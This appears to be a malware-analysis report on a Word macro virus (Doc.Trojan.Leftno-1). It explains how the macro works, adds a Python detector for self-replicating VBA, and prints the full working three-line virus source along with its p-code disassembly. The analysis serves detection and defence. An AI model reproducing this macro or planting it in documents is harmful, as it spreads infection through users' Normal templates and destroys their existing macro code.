Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Word document whose `ThisDocument` module carries a `Document_Open` macro. The macro is a self-replicating macro virus rather than a dropper: `Left(MacroContainer, 2) = "No"` tests whether the running copy lives in the Normal template (the container's name starts with "Normal"), and the `If`/`Else` picks source module `H` and destination module `NH` accordingly, so an infected template writes into the document being opened and an infected document writes into `NormalTemplate`. `NH.CountOfLines <> 3` is the infection marker: the module body is exactly three lines, so any other length means "not yet infected", and the code wipes the destination with `DeleteLines 1, CountOfLines` and rewrites it from `H.Lines(1, 3)` via `AddFromString`. Once Normal.dotm is infected, every document opened afterwards is rewritten and becomes a carrier; whatever code the first component of the target project held is deleted in the process. There is no hardcoded payload beyond the macro's own three lines, no second stage and no network indicator; the code is terse but not obfuscated, and it is the absence of a further stage and of network indicators that keeps the confidence score from going higher. One caveat for triage: the copy depends on the VBA project object model (`VBProject.VBComponents(1).CodeModule`), which Office blocks unless "Trust access to the VBA project object model" is enabled (`AccessVBOM` under the Word `Security` registry key), so on a default-configured host the macro fails with run-time error 6068 and does not spread. The ClamAV signature Doc.Trojan.Leftno-1 agrees with the verdict.
Heuristics (3)

| Heuristic | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Trojan.Leftno-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Trojan.Leftno-1 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (1 related finding) |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro: the code runs automatically when the document is opened |
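The three heuristics above stop at "has macros" and "runs on open"; neither says that the macro copies itself. The following Python is an added example for this report, not the analyzer's own code: it takes decoded VBA text (what olevba produces) and flags the self-replication pattern described in the summary, an auto-exec entry point combined with VBE object-model access that reads and rewrites a code module and names `NormalTemplate`. The indicator names, the regexes and the benign control macro are constructions of the example; the malicious input is the macro carved from this sample. It needs no third-party modules and strips `'` comments first, so a p-code disassembly appended to the extracted file as comments does not produce hits.

```python
"""Flag macro-virus style self-replication in decoded VBA source (added example)."""
import re
from dataclasses import dataclass, field

# Constructed input: the three-line macro carved from this sample, as olevba
# decoded it, with the Attribute lines and appended disassembly dropped.
SAMPLE_MACRO = "\n".join([
    'Private Sub Document_Open(): If Left(MacroContainer, 2) = "No" Then '
    'Set H = NormalTemplate.VBProject.VBComponents(1).CodeModule: '
    'Set NH = ActiveDocument.VBProject.VBComponents(1).CodeModule '
    'Else Set H = ActiveDocument.VBProject.VBComponents(1).CodeModule: '
    'Set NH = NormalTemplate.VBProject.VBComponents(1).CodeModule',
    'If NH.countoflines <> 3 Then NH.deletelines 1, NH.countoflines: '
    'S = H.lines(1, 3): NH.Addfromstring S',
    'End Sub',
])

# Constructed control: auto-runs, but never touches the VBE object model.
BENIGN_MACRO = "\n".join([
    'Private Sub Document_Open()',
    "    ' Only a greeting; VBProject and AddFromString appear in this comment alone.",
    '    MsgBox "Welcome to " & ActiveDocument.Name',
    'End Sub',
])

# Hypothetical indicator set for this example. VBA identifiers are case-insensitive,
# hence re.I (the sample writes countoflines, deletelines, Addfromstring).
INDICATORS = {
    # Entry points Word runs on its own when a document is opened or closed.
    "autoexec": re.compile(
        r"\b(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|AutoNew)\b", re.I),
    # A handle to a module's source through the VBA project object model.
    "code_module": re.compile(
        r"\.VBProject\.VBComponents\s*\([^)]*\)\.CodeModule\b", re.I),
    # Reads macro source out of a module (the virus reads its own lines).
    "code_read": re.compile(r"\.Lines\s*\(", re.I),
    # Writes macro source into a module.
    "code_write": re.compile(r"\b(AddFromString|InsertLines|AddFromFile|ReplaceLine)\b", re.I),
    # Wipes a module before rewriting it.
    "code_delete": re.compile(r"\bDeleteLines\b", re.I),
    # The global template: infecting it makes every later document a carrier.
    "normal_template": re.compile(r"\bNormalTemplate\b", re.I),
}


def strip_comments(vba: str) -> str:
    """Drop ' comments that sit outside string literals, line by line."""
    out = []
    for line in vba.splitlines():
        in_str = False
        cut = len(line)
        for i, ch in enumerate(line):
            if ch == '"':
                in_str = not in_str          # doubled "" toggles twice, net no change
            elif ch == "'" and not in_str:
                cut = i
                break
        out.append(line[:cut])
    return "\n".join(out)


@dataclass
class Verdict:
    hits: dict = field(default_factory=dict)  # indicator name -> first matching text
    self_replicating: bool = False


def analyze(vba: str) -> Verdict:
    """Match every indicator against comment-stripped source and derive a verdict."""
    code = strip_comments(vba)
    verdict = Verdict()
    for name, rx in INDICATORS.items():
        m = rx.search(code)
        if m:
            verdict.hits[name] = m.group(0)
    # Self-replication needs: run by itself, reach a module's code, write code into it,
    # and either read code back out (copying itself) or target the Normal template.
    core = {"autoexec", "code_module", "code_write"}.issubset(verdict.hits)
    spreads = "code_read" in verdict.hits or "normal_template" in verdict.hits
    verdict.self_replicating = core and spreads
    return verdict


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        v = analyze(src)
        print(f"{label}: self_replicating={v.self_replicating} hits={sorted(v.hits)}")
```

Run against the sample it reports all six indicators and `self_replicating=True`; the benign control trips only `autoexec`, which on its own is the same signal the OLE_VBA_DOCOPEN heuristic already gives. The `code_module` pattern is deliberately narrow (the `VBProject.VBComponents(...).CodeModule` chain) so that ordinary `ActiveDocument` automation does not fire.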
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2088 bytes | 627ac9cba622b2977b4633e7782c03e84d1c6baeae3606dd6e90e0fddd77cf12 |

Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): If Left(MacroContainer, 2) = "No" Then Set H = NormalTemplate.VBProject.VBComponents(1).CodeModule: Set NH = ActiveDocument.VBProject.VBComponents(1).CodeModule Else Set H = ActiveDocument.VBProject.VBComponents(1).CodeModule: Set NH = NormalTemplate.VBProject.VBComponents(1).CodeModule
If NH.countoflines <> 3 Then NH.deletelines 1, NH.countoflines: S = H.lines(1, 3): NH.Addfromstring S
End Sub
' Processing file: /opt/analyzer/scan_staging/6c9bc520de23460fb2092df116b6e066.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1499 bytes
' Line #0:
'   FuncDefn (Private Sub Document_Open())
'   BoS 0x0000
'   Ld MacroContainer
'   LitDI2 0x0002
'   ArgsLd LBound 0x0002
'   LitStr 0x0002 "No"
'   Eq
'   If
'   BoSImplicit
'   SetStmt
'   LitDI2 0x0001
'   Ld NormalTemplate
'   MemLd VBProject
'   ArgsMemLd VBComponents 0x0001
'   MemLd CodeModule
'   Set H
'   BoS 0x0000
'   SetStmt
'   LitDI2 0x0001
'   Ld ActiveDocument
'   MemLd VBProject
'   ArgsMemLd VBComponents 0x0001
'   MemLd CodeModule
'   Set NH
'   Else
'   BoSImplicit
'   SetStmt
'   LitDI2 0x0001
'   Ld ActiveDocument
'   MemLd VBProject
'   ArgsMemLd VBComponents 0x0001
'   MemLd CodeModule
'   Set H
'   BoS 0x0000
'   SetStmt
'   LitDI2 0x0001
'   Ld NormalTemplate
'   MemLd VBProject
'   ArgsMemLd VBComponents 0x0001
'   MemLd CodeModule
'   Set NH
'   EndIf
' Line #1:
'   Ld NH
'   MemLd countoflines
'   LitDI2 0x0003
'   Ne
'   If
'   BoSImplicit
'   LitDI2 0x0001
'   Ld NH
'   MemLd countoflines
'   Ld NH
'   ArgsMemCall deletelines 0x0002
'   BoS 0x0000
'   LitDI2 0x0001
'   LitDI2 0x0003
'   Ld H
'   ArgsMemLd lines 0x0002
'   St S
'   BoS 0x0000
'   Ld S
'   Ld NH
'   ArgsMemCall Addfromstring 0x0001
'   EndIf
' Line #2:
'   EndSub
```